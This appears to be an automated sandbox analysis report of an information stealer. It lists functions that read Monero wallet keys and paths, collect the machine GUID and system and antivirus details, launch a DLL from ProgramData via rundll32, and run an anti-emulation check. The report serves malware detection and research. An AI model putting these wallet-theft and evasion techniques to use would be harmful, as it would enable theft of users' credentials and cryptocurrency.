Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

\Monero\wallet.keys, xrefs: 00401B2F
.keys, xrefs: 00401B0D

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 3529164666-3586502688
Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C
MachineGuid, xrefs: 00411640

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
wallet_path, xrefs: 00401A9C

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

C:\Windows\system32\rundll32.exe, xrefs: 00412AE3
C:\ProgramData\, xrefs: 00412995
"" , xrefs: 00412A32
.dll, xrefs: 004129ED

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759

Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 0041566F Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156A4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
lstrcatA.KERNEL32(?,?), ref: 00415725
lstrcatA.KERNEL32(?), ref: 00415738

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID:
API String ID: 3357907479-0
Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94

Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99

Function 6C02C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C02C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C02C969
GetSystemInfo.KERNEL32(?), ref: 6C02C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C02C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C02C9E2

Memory Dump Source

